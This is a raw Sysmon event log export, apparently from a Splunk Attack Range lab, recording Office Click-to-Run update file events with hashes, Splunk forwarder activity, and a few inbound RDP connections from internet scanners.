Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO40UIRES.DLLMD5=3D7B9744AE36E5300523AF85E75D0396,SHA256=95B1EE4977DA697C0AF5A34FC7BABE0D7950D8E78058D92F0A74F2A960B79B49,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070987Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:44.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Mso30win32client.dllMD5=A445F8AB8A9318B5386528233E9109E6,SHA256=3526010BF5A7C983F51BFFC813C1AF6BDA07FC21D4C336B2096B58E11229370D,IMPHASH=106F46C6C1F7C4AA7F2D724311F98BF2truetrue 23542300x800000000000000070986Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:44.282{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Mso20win32client.dllMD5=CE016DA325DE8EF6E3D48C72C9D99350,SHA256=65E6C4C18D295C6EAD64EEB2CF3F8D57A172B258E2E1E4D8D9B1130F938772FC,IMPHASH=58A2B2C9D0843DA00825A7275E434C6Btruetrue 23542300x800000000000000070985Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:44.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO.DLLMD5=13229E1BB6FAA5C31CBEBF505E6A37F8,SHA256=D32C64C8175BE570EACBA83A1DCC8AE251B686BC13C9DF3D2A2371EEA2BD425B,IMPHASH=59ADE9F8D95F5C55474900D48A5B51C0truetrue 23542300x800000000000000049809Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:44.132{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A4D9C9C0E10DC066949996CD2673AA1,SHA256=267E803452681527F6C1A1F4E7FFDC9FCFC913856B213E7D86672A32F27938AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSPTLS.DLLMD5=1BAB8E8FA116706ECB69AEAEA58277CB,SHA256=C7F3FE053C22DB4CE9F35B15F21A128DAEAED296B75D40B68D1F60E341F81E9E,IMPHASH=014C3CB1A8C71877E8ED43B06831840Ftruetrue 23542300x800000000000000071006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLMF.DLLMD5=B56853345B2F5487931CDE9F6C642B62,SHA256=3EB57513D8CD6364DDD560237F6B3C58CDE40A773883A3FB5D9E9286A2C83B94,IMPHASH=2FBBB50A2FD9FBA453E53FAC5D37C71Etruetrue 23542300x800000000000000071005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXEMD5=C70A9EAB8D16418C2BA310B0DA374CAB,SHA256=1AC0ACD64CDD36B67D63813C0E815262754C6A54D092DF43603E7A84C5977DAA,IMPHASH=CD4AFA04C1994AE12FC653965C9B197Ctruetrue 23542300x800000000000000071004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXEV.DLLMD5=B4A46AE6BA8108A2B6E21C20FF5E6AC5,SHA256=A82779D16B8F48F933D95828377CCA67E46D86B64E6E909CCE1FE6D91C30298C,IMPHASH=8AD012F0B626961669A0DAA00477BC38truetrue 23542300x800000000000000071003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msowerrelief.dllMD5=5EE53CCC508DB0CBA795EDF27BCA9A5C,SHA256=93EEE91CD2BA79704A165A09B34CAB7C7CF5A9227570518EDE682B9EB94A376D,IMPHASH=655CC0AC061C8979E38C476C3D269335truetrue 23542300x800000000000000071002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\msoshext.dllMD5=9CE3D8843F669F01F783844FC4CAF8A5,SHA256=2AF71C0ED3941302664AAB5E85CD3565A28EB4D0D57BA1D29E4946E42CD74A09,IMPHASH=CAE0FBF7E6227B8ADFB54CE293801536truetrue 23542300x800000000000000071001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSORES.DLLMD5=602C931E3D1C031EB029C0492D3ECAD2,SHA256=632F8A586BCFF6B8DC432289F00396D029069FC34EF492BC18901C811520F141,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000071000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:43.730{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com58760-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000070999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.751{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F72841CBDBEBE35C8FF8C386EE26C37,SHA256=80B29F614618FA91A65B255385FC84ED8C0E677D04FD2E20F31E00D21C0D2548,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000070998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOPRIV.DLLMD5=5D7120E6A76DD875D5008655EAF79EE5,SHA256=1BBD49D7721B5704D376326B1CE5C486E9E4CC63CAFD665689876CB1DD06C031,IMPHASH=555439F03BF8AD76830B96D5DDD98AB5truetrue 23542300x800000000000000070997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.079{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOIDRES.DLLMD5=CEE457CB36FDF7DE289295A05597B682,SHA256=1EC70C585B4FB9AFCF17C3949DCA1E99BFB0413C96BCA98ECA25C5AC020DAA2A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070996Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.063{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOIDCLIL.DLLMD5=A70C38D2A1EDD18C91A795E8350FD569,SHA256=67B0CDFD20A1AB35568F93AE8AF89A5DAC779E66EAD3990E5E5D81F5DA8721A6,IMPHASH=3851DB4A49725A75EC5531978F341596truetrue 23542300x800000000000000070995Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOICONS.EXEMD5=67A695F0F5BEC3E25DFEDA81A0E26C31,SHA256=46BE361D99881A57080A5904BCDA370F9B6E0B0F9DEFBE1B0CE0AA77AFA5A9A9,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000070994Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:45.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSO99LRES.DLLMD5=D1B0D8C6EA885DBF81A8962718D3B17E,SHA256=42D2F7FFB7CBA96B580FE2E41DA8F7B0F54BC7F94A6F69BC9B855AC6C03357EF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000049812Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:45.788{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C70D7441D3713ACEA78A502675088800,SHA256=AB9A362524B550511633BE103C947EA52B13ED98FFF091623780709628B34587,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049811Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:43.211{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61670-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049810Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:45.148{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=348AB14398CA3B04F4EBDDC0775FF8B4,SHA256=E9CCC91876492AD5F9BC1FA347612F68414121B54F0DD142BC71095085A2E6C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBEUI.DLLMD5=F61ACCA99010E982D1E25BB1DCACCF30,SHA256=89B47B853D071F3862E57037180555D13264D3B521253EB985863065FC27EF68,IMPHASH=F167294CA50F7D378B96DB3328869523truetrue 23542300x800000000000000071253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBE7.DLLMD5=0890BD3163852EDB987433AB40631B2B,SHA256=99E6A1505418EA2B1AD84DE8E49D72DA4BD29822EAB088B6CB3ADBBF5EA6532B,IMPHASH=150029E984790C7A698A8E7E9FD2048Atruetrue 23542300x800000000000000071252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.876{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\1033\VBEUIINTL.DLLMD5=F21AB1D05002FFEEF17AB564DE23544B,SHA256=64A002C21FBBC2879E1E38561414F25519057B488CFC4867F9783F4D57C66C5F,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000071251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:44.904{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com56433-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000071250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:44.731{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-53616-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000071249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\1033\VBE7INTL.DLLMD5=CDA3EA478C604783B76964E88FD7030D,SHA256=DEBCD9E5DA29B2675C95055DBC342B74369BB5ED34ED5BAFC0738F470D5B4E69,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.845{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\MSB1XTOR.DLLMD5=B2F19DEC829A0D01CD7CA07A135A9DEE,SHA256=2F21A8A3CFACFCC65491DE396A8EE2B16CAC68F0F3ADFCE77812471FB739AA7A,IMPHASH=A585C24D8EB3746E2FBCE949C238C52Atruetrue 23542300x800000000000000071247Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\MSB1CORE.DLLMD5=C613531C04DEE7E8C739DA263C1C982B,SHA256=0C74E6FE3C8783B6AFF0368E9BEFBAE418C5AB8956AC658BD9705BD181C1D92C,IMPHASH=E6F9A6C415245E3FFA155CEEF077AEF2truetrue 23542300x800000000000000071246Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\MSB1CACH.LEXMD5=72F5C05B7EA8DD6059BF59F50B22DF33,SHA256=1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071245Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\WT61FR.LEXMD5=AC1A4D9488BA1EADBA8E75DE999F458B,SHA256=23D1353BE7B274F49B81681DD0C38EE8610A4AB474027DD0E6E785F4F78BBEA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071244Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\MSB1FREN.ITSMD5=C5E1AACA8C5E036362454EE35FF58954,SHA256=C757B055C46CB251E3156C6A330C3A1D4A2EEFF9E6033639BFB6DBACBB28799F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071243Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\FREN\MSB1FREN.DLLMD5=F81C84BF7BC7F0DC4F79E191E53954CB,SHA256=14076061A5302395E27BC492D04E6AF52F361900ACF6C1DE64B286CFBD1F00E5,IMPHASH=BEC490F8B7EA2306867C21B859EE235Ctruetrue 23542300x800000000000000071242Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\WT61ES.LEXMD5=F2F705D54ACE093DF8926457457CEAAB,SHA256=F062122E982549CACE246336228C99D06F9A593E06771437832DAC14C23C1622,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071241Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.782{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\MSB1ESEN.ITSMD5=F070EB5C7F32BC459F28868EBD7366AE,SHA256=6C00FCD51C975866AF367AD05F5D6A918F71E98E98B7FB0251840A8C98F194AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.766{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\MSB1ESEN.DLLMD5=92677D1294A14AE98945A4801787BC2B,SHA256=DAE41FD24533F160BBCD3A895A1142DB5B500D76369F026D93297BD3F55DD784,IMPHASH=BEC490F8B7EA2306867C21B859EE235Ctruetrue 23542300x800000000000000071239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.766{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ENFR\MSB1ENFR.ITSMD5=30C994B72C8C51A6BDB179E8C65F4119,SHA256=8A1D16B3783F1CE30B0A961072959AE94BE5822E659C50DD2325FCB1B443C9C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.751{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ENES\MSB1ENES.ITSMD5=0F5FEF8BAF126FA8D17FCB6C9BCA60E6,SHA256=C122F2C1157563D8DF9C7CE28C47FCB2C6DD8BEF81BD0718444D830FBD7AE098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\THEMES.INFMD5=923AB7258E7D5067BC98151B8C655122,SHA256=DE50EB8F5E6A91D7528D6C8F9182672C63BFFC67C75E8B8452C41285913D7CA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATERMAR\WATERMAR.INFMD5=FC0319A91851214A949BEE6BF652E9C7,SHA256=4E33A4F9B3860E4297EF616F2AE7D9180AF22DE743A6D856C2808A2269EFC150,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATERMAR\WATERMAR.ELMMD5=42FBEAC23709FADA0172325C90B16A2D,SHA256=C8C3BEE802006417B55BD38B425BF0A0B81C3B530B0071506E604ED43EFC188B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATERMAR\THMBNAIL.PNGMD5=AAD47ED974F403C17E8BBE7E06C06AAA,SHA256=CE230D731AF61A231E0302D80B55A546B6A61E541B0362AEAEE9B1BCB5C2359F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\WATERMAR\PREVIEW.GIFMD5=6D337EEA691A1040F3CB656236B96603,SHA256=157837838E1389DD95E5780803CE8AEBA67B18C4F3DD906A9F205D88E3327926,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:46.735{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 